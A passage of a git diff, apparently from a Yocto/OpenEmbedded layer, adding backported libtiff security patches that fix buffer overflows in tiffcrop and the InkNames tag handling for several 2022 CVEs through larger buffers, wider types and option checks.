++        bytebuff4 = (uint8)(buff2 >> 32);
+         *dst++ = bytebuff4;
+         ready_bits -= 32;
+                     
+@@ -3495,13 +3512,13 @@ extractContigSamplesShifted32bits (uint8 *in, uint8 *out, uint32 cols,
+         }
+       else  /* If we have a full buffer's worth, write it out */
+         {
+-        bytebuff1 = (buff2 >> 56);
++        bytebuff1 = (uint8)(buff2 >> 56);
+         *dst++ = bytebuff1;
+-        bytebuff2 = (buff2 >> 48);
++        bytebuff2 = (uint8)(buff2 >> 48);
+         *dst++ = bytebuff2;
+-        bytebuff3 = (buff2 >> 40);
++        bytebuff3 = (uint8)(buff2 >> 40);
+         *dst++ = bytebuff3;
+-        bytebuff4 = (buff2 >> 32);
++        bytebuff4 = (uint8)(buff2 >> 32);
+         *dst++ = bytebuff4;
+         ready_bits -= 32;
+                     
+@@ -3678,10 +3695,10 @@ extractContigSamplesToTileBuffer(uint8 *out, uint8 *in, uint32 rows, uint32 cols
+ static int readContigStripsIntoBuffer (TIFF* in, uint8* buf)
+ {
+         uint8* bufp = buf;
+-        int32  bytes_read = 0;
++        tmsize_t  bytes_read = 0;
+         uint32 strip, nstrips   = TIFFNumberOfStrips(in);
+-        uint32 stripsize = TIFFStripSize(in);
+-        uint32 rows = 0;
++        tmsize_t stripsize = TIFFStripSize(in);
++        tmsize_t rows = 0;
+         uint32 rps = TIFFGetFieldDefaulted(in, TIFFTAG_ROWSPERSTRIP, &rps);
+         tsize_t scanline_size = TIFFScanlineSize(in);
+ 
+@@ -3694,13 +3711,12 @@ static int readContigStripsIntoBuffer (TIFF* in, uint8* buf)
+                 bytes_read = TIFFReadEncodedStrip (in, strip, bufp, -1);
+                 rows = bytes_read / scanline_size;
+                 if ((strip < (nstrips - 1)) && (bytes_read != (int32)stripsize))
+-                        TIFFError("", "Strip %d: read %lu bytes, strip size %lu",
+-                                  (int)strip + 1, (unsigned long) bytes_read,
+-                                  (unsigned long)stripsize);
++                        TIFFError("", "Strip %"PRIu32": read %"PRId64" bytes, strip size %"PRIu64,
++                                  strip + 1, bytes_read, stripsize);
+ 
+                 if (bytes_read < 0 && !ignore) {
+-                        TIFFError("", "Error reading strip %lu after %lu rows",
+-                                  (unsigned long) strip, (unsigned long)rows);
++                        TIFFError("", "Error reading strip %"PRIu32" after %"PRIu64" rows",
++                                  strip, rows);
+                         return 0;
+                 }
+                 bufp += stripsize;
+@@ -4164,13 +4180,13 @@ combineSeparateSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
+ 	/* If we have a full buffer's worth, write it out */
+ 	if (ready_bits >= 32)
+ 	  {
+-	  bytebuff1 = (buff2 >> 56);
++	  bytebuff1 = (uint8)(buff2 >> 56);
+ 	  *dst++ = bytebuff1;
+-	  bytebuff2 = (buff2 >> 48);
++	  bytebuff2 = (uint8)(buff2 >> 48);
+ 	  *dst++ = bytebuff2;
+-	  bytebuff3 = (buff2 >> 40);
++	  bytebuff3 = (uint8)(buff2 >> 40);
+ 	  *dst++ = bytebuff3;
+-	  bytebuff4 = (buff2 >> 32);
++	  bytebuff4 = (uint8)(buff2 >> 32);
+ 	  *dst++ = bytebuff4;
+ 	  ready_bits -= 32;
+                     
+@@ -4213,10 +4229,10 @@ combineSeparateSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
+ 	         "Row %3d, Col %3d, Src byte offset %3d  bit offset %2d  Dst offset %3d",
+ 		 row + 1, col + 1, src_byte, src_bit, dst - out);
+ 
+-      dump_long (dumpfile, format, "Match bits ", matchbits);
++      dump_wide (dumpfile, format, "Match bits ", matchbits);
+       dump_data (dumpfile, format, "Src   bits ", src, 4);
+-      dump_long (dumpfile, format, "Buff1 bits ", buff1);
+-      dump_long (dumpfile, format, "Buff2 bits ", buff2);
++      dump_wide (dumpfile, format, "Buff1 bits ", buff1);
++      dump_wide (dumpfile, format, "Buff2 bits ", buff2);
+       dump_byte (dumpfile, format, "Write bits1", bytebuff1);
+       dump_byte (dumpfile, format, "Write bits2", bytebuff2);
+       dump_info (dumpfile, format, "", "Ready bits:  %2d", ready_bits); 
+@@ -4689,13 +4705,13 @@ combineSeparateTileSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
+ 	/* If we have a full buffer's worth, write it out */
+ 	if (ready_bits >= 32)
+ 	  {
+-	  bytebuff1 = (buff2 >> 56);
++	  bytebuff1 = (uint8)(buff2 >> 56);
+ 	  *dst++ = bytebuff1;
+-	  bytebuff2 = (buff2 >> 48);
++	  bytebuff2 = (uint8)(buff2 >> 48);
+ 	  *dst++ = bytebuff2;
+-	  bytebuff3 = (buff2 >> 40);
++	  bytebuff3 = (uint8)(buff2 >> 40);
+ 	  *dst++ = bytebuff3;
+-	  bytebuff4 = (buff2 >> 32);
++	  bytebuff4 = (uint8)(buff2 >> 32);
+ 	  *dst++ = bytebuff4;
+ 	  ready_bits -= 32;
+                     
+@@ -4738,10 +4754,10 @@ combineSeparateTileSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
+ 	         "Row %3d, Col %3d, Src byte offset %3d  bit offset %2d  Dst offset %3d",
+ 		 row + 1, col + 1, src_byte, src_bit, dst - out);
+ 
+-      dump_long (dumpfile, format, "Match bits ", matchbits);
++      dump_wide (dumpfile, format, "Match bits ", matchbits);
+       dump_data (dumpfile, format, "Src   bits ", src, 4);
+-      dump_long (dumpfile, format, "Buff1 bits ", buff1);
+-      dump_long (dumpfile, format, "Buff2 bits ", buff2);
++      dump_wide (dumpfile, format, "Buff1 bits ", buff1);
++      dump_wide (dumpfile, format, "Buff2 bits ", buff2);
+       dump_byte (dumpfile, format, "Write bits1", bytebuff1);
+       dump_byte (dumpfile, format, "Write bits2", bytebuff2);
+       dump_info (dumpfile, format, "", "Ready bits:  %2d", ready_bits); 
+@@ -4764,7 +4780,7 @@ static int readSeparateStripsIntoBuffer (TIFF *in, uint8 *obuf, uint32 length,
+   {
+   int i, bytes_per_sample, bytes_per_pixel, shift_width, result = 1;
+   uint32 j;
+-  int32  bytes_read = 0;
++  tmsize_t  bytes_read = 0;
+   uint16 bps = 0, planar;
+   uint32 nstrips;
+   uint32 strips_per_sample;
+@@ -4830,7 +4846,7 @@ static int readSeparateStripsIntoBuffer (TIFF *in, uint8 *obuf, uint32 length,
+   for (s = 0; (s < spp) && (s < MAX_SAMPLES); s++)
+     {
+     srcbuffs[s] = NULL;
+-    buff = _TIFFmalloc(stripsize + 3);
++    buff = _TIFFmalloc(stripsize + NUM_BUFF_OVERSIZE_BYTES);
+     if (!buff)
+       {
+       TIFFError ("readSeparateStripsIntoBuffer", 
+@@ -4853,7 +4869,7 @@ static int readSeparateStripsIntoBuffer (TIFF *in, uint8 *obuf, uint32 length,
+       buff = srcbuffs[s];
+       strip = (s * strips_per_sample) + j; 
+       bytes_read = TIFFReadEncodedStrip (in, strip, buff, stripsize);
+-      rows_this_strip = bytes_read / src_rowsize;
++      rows_this_strip = (uint32)(bytes_read / src_rowsize);
+       if (bytes_read < 0 && !ignore)
+         {
+         TIFFError(TIFFFileName(in),
+@@ -5860,13 +5876,14 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+   uint16   input_compression = 0, input_photometric = 0;
+   uint16   subsampling_horiz, subsampling_vert;
+   uint32   width = 0, length = 0;
+-  uint32   stsize = 0, tlsize = 0, buffsize = 0, scanlinesize = 0;
++  tmsize_t   stsize = 0, tlsize = 0, buffsize = 0;
++  tmsize_t   scanlinesize = 0;
+   uint32   tw = 0, tl = 0;       /* Tile width and length */
+-  uint32   tile_rowsize = 0;
++  tmsize_t   tile_rowsize = 0;
+   unsigned char *read_buff = NULL;
+   unsigned char *new_buff  = NULL;
+   int      readunit = 0;
+-  static   uint32  prev_readsize = 0;
++  static   tmsize_t  prev_readsize = 0;
+ 
+   TIFFGetFieldDefaulted(in, TIFFTAG_BITSPERSAMPLE, &bps);
+   TIFFGetFieldDefaulted(in, TIFFTAG_SAMPLESPERPIXEL, &spp);
+@@ -6168,7 +6185,7 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+         TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
+         return (-1);
+     }
+-    read_buff = (unsigned char *)_TIFFmalloc(buffsize+3);
++    read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
+   }
+   else
+     {
+@@ -6179,11 +6196,11 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+           TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
+           return (-1);
+       }
+-      new_buff = _TIFFrealloc(read_buff, buffsize+3);
++      new_buff = _TIFFrealloc(read_buff, buffsize + NUM_BUFF_OVERSIZE_BYTES);
+       if (!new_buff)
+         {
+ 	free (read_buff);
+-        read_buff = (unsigned char *)_TIFFmalloc(buffsize+3);
++        read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
+         }
+       else
+         read_buff = new_buff;
+@@ -6256,8 +6273,13 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+     dump_info  (dump->infile, dump->format, "", 
+                 "Bits per sample %d, Samples per pixel %d", bps, spp);
+ 
++    if ((uint64_t)scanlinesize > 0x0ffffffffULL) {
++        dump_info(dump->infile, dump->format, "loadImage",
++            "Attention: scanlinesize %"PRIu64" is larger than UINT32_MAX.\nFollowing dump might be wrong.",
++            (uint64_t)scanlinesize);
++    }
+     for (i = 0; i < length; i++)
+-      dump_buffer(dump->infile, dump->format, 1, scanlinesize, 
++      dump_buffer(dump->infile, dump->format, 1, (uint32)scanlinesize, 
+                   i, read_buff + (i * scanlinesize));
+     }
+   return (0);
+@@ -7277,13 +7299,13 @@ writeSingleSection(TIFF *in, TIFF *out, struct image_data *image,
+      if (TIFFGetField(in, TIFFTAG_NUMBEROFINKS, &ninks)) {
+        TIFFSetField(out, TIFFTAG_NUMBEROFINKS, ninks);
+        if (TIFFGetField(in, TIFFTAG_INKNAMES, &inknames)) {
+-	 int inknameslen = strlen(inknames) + 1;
++	 int inknameslen = (int)strlen(inknames) + 1;
+ 	 const char* cp = inknames;
+ 	 while (ninks > 1) {
+ 	   cp = strchr(cp, '\0');
+ 	   if (cp) {
+ 	     cp++;
+-	     inknameslen += (strlen(cp) + 1);
++	     inknameslen += ((int)strlen(cp) + 1);
+ 	   }
+ 	   ninks--;
+          }
+@@ -7346,23 +7368,23 @@ createImageSection(uint32 sectsize, unsigned char **sect_buff_ptr)
+ 
+   if (!sect_buff)
+     {
+-    sect_buff = (unsigned char *)_TIFFmalloc(sectsize);
++    sect_buff = (unsigned char *)_TIFFmalloc(sectsize + NUM_BUFF_OVERSIZE_BYTES);
+     if (!sect_buff)
+     {
+         TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
+         return (-1);
+     }
+-    _TIFFmemset(sect_buff, 0, sectsize);
++    _TIFFmemset(sect_buff, 0, sectsize + NUM_BUFF_OVERSIZE_BYTES);
+     }
+   else
+     {
+     if (prev_sectsize < sectsize)
+       {
+-      new_buff = _TIFFrealloc(sect_buff, sectsize);
++      new_buff = _TIFFrealloc(sect_buff, sectsize + NUM_BUFF_OVERSIZE_BYTES);
+       if (!new_buff)
+         {
+ 	free (sect_buff);
+-        sect_buff = (unsigned char *)_TIFFmalloc(sectsize);
++        sect_buff = (unsigned char *)_TIFFmalloc(sectsize + NUM_BUFF_OVERSIZE_BYTES);
+         }
+       else
+         sect_buff = new_buff;
+@@ -7372,7 +7394,7 @@ createImageSection(uint32 sectsize, unsigned char **sect_buff_ptr)
+           TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
+           return (-1);
+       }
+-      _TIFFmemset(sect_buff, 0, sectsize);
++      _TIFFmemset(sect_buff, 0, sectsize + NUM_BUFF_OVERSIZE_BYTES);
+       }
+     }
+ 
+@@ -7403,17 +7425,17 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+     cropsize = crop->bufftotal;
+     crop_buff = seg_buffs[0].buffer; 
+     if (!crop_buff)
+-      crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++      crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+     else
+       {
+       prev_cropsize = seg_buffs[0].size;
+       if (prev_cropsize < cropsize)
+         {
+-        next_buff = _TIFFrealloc(crop_buff, cropsize);
++        next_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+         if (! next_buff)
+           {
+           _TIFFfree (crop_buff);
+-          crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++          crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+           }
+         else
+           crop_buff = next_buff;
+@@ -7426,7 +7448,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+       return (-1);
+       }
+  
+-    _TIFFmemset(crop_buff, 0, cropsize);
++    _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+     seg_buffs[0].buffer = crop_buff;
+     seg_buffs[0].size = cropsize;
+ 
+@@ -7505,17 +7527,17 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+       cropsize = crop->bufftotal;
+       crop_buff = seg_buffs[i].buffer; 
+       if (!crop_buff)
+-        crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++        crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+       else
+         {
+         prev_cropsize = seg_buffs[0].size;
+         if (prev_cropsize < cropsize)
+           {
+-          next_buff = _TIFFrealloc(crop_buff, cropsize);
++          next_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+           if (! next_buff)
+             {
+             _TIFFfree (crop_buff);
+-            crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++            crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+             }
+           else
+             crop_buff = next_buff;
+@@ -7528,7 +7550,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+         return (-1);
+         }
+  
+-      _TIFFmemset(crop_buff, 0, cropsize);
++      _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+       seg_buffs[i].buffer = crop_buff;
+       seg_buffs[i].size = cropsize;
+ 
+@@ -7641,24 +7663,24 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+   crop_buff = *crop_buff_ptr;
+   if (!crop_buff)
+     {
+-    crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++    crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+     if (!crop_buff)
+     {
+         TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
+         return (-1);
+     }
+-    _TIFFmemset(crop_buff, 0, cropsize);
++    _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+     prev_cropsize = cropsize;
+     }
+   else
+     {
+     if (prev_cropsize < cropsize)
+       {
+-      new_buff = _TIFFrealloc(crop_buff, cropsize);
++      new_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+       if (!new_buff)
+         {
+ 	free (crop_buff);
+-        crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++        crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+         }
+       else
+         crop_buff = new_buff;
+@@ -7667,7 +7689,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+           TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
+           return (-1);
+       }
+-      _TIFFmemset(crop_buff, 0, cropsize);
++      _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+       }
+     }
+ 
+@@ -7965,13 +7987,13 @@ writeCroppedImage(TIFF *in, TIFF *out, struct image_data *image,
+      if (TIFFGetField(in, TIFFTAG_NUMBEROFINKS, &ninks)) {
+        TIFFSetField(out, TIFFTAG_NUMBEROFINKS, ninks);
+        if (TIFFGetField(in, TIFFTAG_INKNAMES, &inknames)) {
+-	 int inknameslen = strlen(inknames) + 1;
++	 int inknameslen = (int)strlen(inknames) + 1;
+ 	 const char* cp = inknames;
+ 	 while (ninks > 1) {
+ 	   cp = strchr(cp, '\0');
+ 	   if (cp) {
+ 	     cp++;
+-	     inknameslen += (strlen(cp) + 1);
++	     inknameslen += ((int)strlen(cp) + 1);
+ 	   }
+ 	   ninks--;
+          }
+@@ -8356,13 +8378,13 @@ rotateContigSamples32bits(uint16 rotation, uint16 spp, uint16 bps, uint32 width,
+         }
+       else /* If we have a full buffer's worth, write it out */
+         {
+-        bytebuff1 = (buff2 >> 56);
++        bytebuff1 = (uint8)(buff2 >> 56);
+         *dst++ = bytebuff1;
+-        bytebuff2 = (buff2 >> 48);
++        bytebuff2 = (uint8)(buff2 >> 48);
+         *dst++ = bytebuff2;
+-        bytebuff3 = (buff2 >> 40);
++        bytebuff3 = (uint8)(buff2 >> 40);
+         *dst++ = bytebuff3;
+-        bytebuff4 = (buff2 >> 32);
++        bytebuff4 = (uint8)(buff2 >> 32);
+         *dst++ = bytebuff4;
+         ready_bits -= 32;
+                     
+@@ -8431,12 +8453,13 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+               return (-1);
+     }
+ 
+-  if (!(rbuff = (unsigned char *)_TIFFmalloc(buffsize)))
++  /* Add 3 padding bytes for extractContigSamplesShifted32bits */
++  if (!(rbuff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES)))
+     {
+-    TIFFError("rotateImage", "Unable to allocate rotation buffer of %1u bytes", buffsize);
++    TIFFError("rotateImage", "Unable to allocate rotation buffer of %1u bytes", buffsize + NUM_BUFF_OVERSIZE_BYTES);
+     return (-1);
+     }
+-  _TIFFmemset(rbuff, '\0', buffsize);
++  _TIFFmemset(rbuff, '\0', buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ 
+   ibuff = *ibuff_ptr;
+   switch (rotation)
+@@ -8964,13 +8987,13 @@ reverseSamples32bits (uint16 spp, uint16 bps, uint32 width,
+         }
+       else /* If we have a full buffer's worth, write it out */
+         {
+-        bytebuff1 = (buff2 >> 56);
++        bytebuff1 = (uint8)(buff2 >> 56);
+         *dst++ = bytebuff1;
+-        bytebuff2 = (buff2 >> 48);
++        bytebuff2 = (uint8)(buff2 >> 48);
+         *dst++ = bytebuff2;
+-        bytebuff3 = (buff2 >> 40);
++        bytebuff3 = (uint8)(buff2 >> 40);
+         *dst++ = bytebuff3;
+-        bytebuff4 = (buff2 >> 32);
++        bytebuff4 = (uint8)(buff2 >> 32);
+         *dst++ = bytebuff4;
+         ready_bits -= 32;
+                     
+@@ -9061,12 +9084,13 @@ mirrorImage(uint16 spp, uint16 bps, uint16 mirror, uint32 width, uint32 length,
+     {
+     case MIRROR_BOTH:
+     case MIRROR_VERT: 
+-             line_buff = (unsigned char *)_TIFFmalloc(rowsize);
++             line_buff = (unsigned char *)_TIFFmalloc(rowsize + NUM_BUFF_OVERSIZE_BYTES);
+              if (line_buff == NULL)
+                {
+-	       TIFFError ("mirrorImage", "Unable to allocate mirror line buffer of %1u bytes", rowsize);
++	       TIFFError ("mirrorImage", "Unable to allocate mirror line buffer of %1u bytes", rowsize + NUM_BUFF_OVERSIZE_BYTES);
+                return (-1);
+                }
++             _TIFFmemset(line_buff, '\0', rowsize + NUM_BUFF_OVERSIZE_BYTES);
+ 
+              dst = ibuff + (rowsize * (length - 1));
+              for (row = 0; row < length / 2; row++)
+@@ -9098,11 +9122,12 @@ mirrorImage(uint16 spp, uint16 bps, uint16 mirror, uint32 width, uint32 length,
+ 		}
+ 	      else
+                 { /* non 8 bit per sample  data */
+-                if (!(line_buff = (unsigned char *)_TIFFmalloc(rowsize + 1)))
++                if (!(line_buff = (unsigned char *)_TIFFmalloc(rowsize + NUM_BUFF_OVERSIZE_BYTES)))
+                   {
+                   TIFFError("mirrorImage", "Unable to allocate mirror line buffer");
+                   return (-1);
+                   }
++                _TIFFmemset(line_buff, '\0', rowsize + NUM_BUFF_OVERSIZE_BYTES);
+                 bytes_per_sample = (bps + 7) / 8;
+                 bytes_per_pixel  = ((bps * spp) + 7) / 8;
+                 if (bytes_per_pixel < (bytes_per_sample + 1))
+@@ -9114,7 +9139,7 @@ mirrorImage(uint16 spp, uint16 bps, uint16 mirror, uint32 width, uint32 length,
+                   {
+ 		  row_offset = row * rowsize;
+                   src = ibuff + row_offset;
+-                  _TIFFmemset (line_buff, '\0', rowsize);
++                  _TIFFmemset (line_buff, '\0', rowsize + NUM_BUFF_OVERSIZE_BYTES);
+                   switch (shift_width)
+                     {
+                     case 1: if (reverseSamples16bits(spp, bps, width, src, line_buff))
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch
new file mode 100644
index 0000000000..18a4b4e0ff
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch
@@ -0,0 +1,123 @@
+From f7c06c395daf1b2c52ab431e00db2d9fc2ac993e Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Tue, 10 May 2022 20:03:17 +0000
+Subject: [PATCH] tiffcrop: Fix issue #330 and some more from 320 to 349
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2022-3597 CVE-2022-3626 CVE-2022-3627
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/e319508023580e2f70e6e626f745b5b2a1707313
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/8fe3735942ea1d90d8cef843b55b3efe8ab6feaf
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/bad48e90b410df32172006c7876da449ba62cdba
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/236b7191f04c60d09ee836ae13b50f812c841047
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-01-17
+
+---
+ tools/tiffcrop.c | 50 ++++++++++++++++++++++++++++++++++++++++--------
+ 1 file changed, 42 insertions(+), 8 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index c923920..a0789a3 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -103,7 +103,12 @@
+  *                selects which functions dump data, with higher numbers selecting
+  *                lower level, scanline level routines. Debug reports a limited set
+  *                of messages to monitor progess without enabling dump logs.
+- */
++ *
++ * Note 1:  The (-X|-Y), -Z, -z and -S options are mutually exclusive.
++ *          In no case should the options be applied to a given selection successively.
++ * Note 2:  Any of the -X, -Y, -Z and -z options together with other PAGE_MODE_x options
++ *          such as -H, -V, -P, -J or -K are not supported and may cause buffer overflows.
++  */
+ 
+ static   char tiffcrop_version_id[] = "2.4.1";
+ static   char tiffcrop_rev_date[] = "03-03-2010";
+@@ -176,12 +181,12 @@ extern int getopt(int argc, char * const argv[], const char *optstring);
+ #define ROTATECW_270 32
+ #define ROTATE_ANY (ROTATECW_90 | ROTATECW_180 | ROTATECW_270)
+ 
+-#define CROP_NONE     0
+-#define CROP_MARGINS  1
+-#define CROP_WIDTH    2
+-#define CROP_LENGTH   4
+-#define CROP_ZONES    8
+-#define CROP_REGIONS 16
++#define CROP_NONE     0     /* "-S" -> Page_MODE_ROWSCOLS and page->rows/->cols != 0 */
++#define CROP_MARGINS  1     /* "-m" */
++#define CROP_WIDTH    2     /* "-X" */
++#define CROP_LENGTH   4     /* "-Y" */
++#define CROP_ZONES    8     /* "-Z" */
++#define CROP_REGIONS 16     /* "-z" */
+ #define CROP_ROTATE  32
+ #define CROP_MIRROR  64
+ #define CROP_INVERT 128
+@@ -323,7 +328,7 @@ struct crop_mask {
+ #define PAGE_MODE_RESOLUTION   1
+ #define PAGE_MODE_PAPERSIZE    2
+ #define PAGE_MODE_MARGINS      4
+-#define PAGE_MODE_ROWSCOLS     8
++#define PAGE_MODE_ROWSCOLS     8    /* for -S option */
+ 
+ #define INVERT_DATA_ONLY      10
+ #define INVERT_DATA_AND_TAG   11
+@@ -754,6 +759,12 @@ static   char* usage_info[] = {
+ "             The four debug/dump options are independent, though it makes little sense to",
+ "             specify a dump file without specifying a detail level.",
+ " ",
++"Note 1:      The (-X|-Y), -Z, -z and -S options are mutually exclusive.",
++"             In no case should the options be applied to a given selection successively.",
++" ",
++"Note 2:      Any of the -X, -Y, -Z and -z options together with other PAGE_MODE_x options",
++"             such as - H, -V, -P, -J or -K are not supported and may cause buffer overflows.",
++" ",
+ NULL
+ };
+ 
+@@ -2112,6 +2123,27 @@ void  process_command_opts (int argc, char *argv[], char *mp, char *mode, uint32
+ 		/*NOTREACHED*/
+       }
+     }
++    /*-- Check for not allowed combinations (e.g. -X, -Y and -Z, -z and -S are mutually exclusive) --*/
++    char XY, Z, R, S;
++    XY = ((crop_data->crop_mode & CROP_WIDTH) || (crop_data->crop_mode & CROP_LENGTH)) ? 1 : 0;
++    Z = (crop_data->crop_mode & CROP_ZONES) ? 1 : 0;
++    R = (crop_data->crop_mode & CROP_REGIONS) ? 1 : 0;
++    S = (page->mode & PAGE_MODE_ROWSCOLS) ? 1 : 0;
++    if (XY + Z + R + S > 1) {
++        TIFFError("tiffcrop input error", "The crop options(-X|-Y), -Z, -z and -S are mutually exclusive.->exit");
++        exit(EXIT_FAILURE);
++    }
++
++    /* Check for not allowed combination:
++     * Any of the -X, -Y, -Z and -z options together with other PAGE_MODE_x options
++     * such as -H, -V, -P, -J or -K are not supported and may cause buffer overflows.
++.    */
++    if ((XY + Z + R > 0) && page->mode != PAGE_MODE_NONE) {
++        TIFFError("tiffcrop input error",
++            "Any of the crop options -X, -Y, -Z and -z together with other PAGE_MODE_x options such as - H, -V, -P, -J or -K is not supported and may cause buffer overflows..->exit");
++        exit(EXIT_FAILURE);
++    }
++
+   }  /* end process_command_opts */
+ 
+ /* Start a new output file if one has not been previously opened or
+@@ -2384,6 +2416,7 @@ main(int argc, char* argv[])
+         exit (-1);
+ 	}
+ 
++      /* Crop input image and copy zones and regions from input image into seg_buffs or crop_buff. */
+       if (crop.selections > 0)
+         {
+         if (processCropSelections(&image, &crop, &read_buff, seg_buffs))
+@@ -2400,6 +2433,7 @@ main(int argc, char* argv[])
+           exit (-1);
+ 	  }
+ 	}
++      /* Format and write selected image parts to output file(s). */
+       if (page.mode == PAGE_MODE_NONE)
+         {  /* Whole image or sections not based on output page size */
+         if (crop.selections > 0)
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch
new file mode 100644
index 0000000000..b3232d9002
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch
@@ -0,0 +1,277 @@
+From 01bca7e6f608da7696949fca6acda78b9935ba19 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Tue, 30 Aug 2022 16:56:48 +0200
+Subject: [PATCH] Revised handling of TIFFTAG_INKNAMES and related
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2022-3599 CVE-2022-4645 CVE-2023-30774
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/e813112545942107551433d61afd16ac094ff246
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-01-17
+
+ TIFFTAG_NUMBEROFINKS value
+
+In order to solve the buffer overflow issues related to TIFFTAG_INKNAMES and related TIFFTAG_NUMBEROFINKS value, a revised handling of those tags within LibTiff is proposed:
+
+Behaviour for writing:
+    `NumberOfInks`  MUST fit to the number of inks in the `InkNames` string.
+    `NumberOfInks` is automatically set when `InkNames` is set.
+    If `NumberOfInks` is different to the number of inks within `InkNames` string, that will be corrected and a warning is issued.
+    If `NumberOfInks` is not equal to samplesperpixel only a warning will be issued.
+
+Behaviour for reading:
+    When reading `InkNames` from a TIFF file, the `NumberOfInks` will be set automatically to the number of inks in `InkNames` string.
+    If `NumberOfInks` is different to the number of inks within `InkNames` string, that will be corrected and a warning is issued.
+    If  `NumberOfInks` is not equal to samplesperpixel only a warning will be issued.
+
+This allows the safe use of the NumberOfInks value to read out the InkNames without buffer overflow
+
+This MR will close the following issues:  #149, #150, #152, #168 (to be checked), #250, #269, #398 and #456.
+
+It also fixes the old bug at http://bugzilla.maptools.org/show_bug.cgi?id=2599, for which the limitation of `NumberOfInks = SPP` was introduced, which is in my opinion not necessary and does not solve the general issue.
+
+---
+ libtiff/tif_dir.c      | 120 ++++++++++++++++++++++++-----------------
+ libtiff/tif_dir.h      |   2 +
+ libtiff/tif_dirinfo.c  |   2 +-
+ libtiff/tif_dirwrite.c |   5 ++
+ libtiff/tif_print.c    |   4 ++
+ 5 files changed, 83 insertions(+), 50 deletions(-)
+
+diff --git a/libtiff/tif_dir.c b/libtiff/tif_dir.c
+index 39aeeb4..9d8267a 100644
+--- a/libtiff/tif_dir.c
++++ b/libtiff/tif_dir.c
+@@ -29,6 +29,7 @@
+  * (and also some miscellaneous stuff)
+  */
+ #include "tiffiop.h"
++# include <inttypes.h>
+ 
+ /*
+  * These are used in the backwards compatibility code...
+@@ -137,32 +138,30 @@ setExtraSamples(TIFF* tif, va_list ap, uint32* v)
+ }
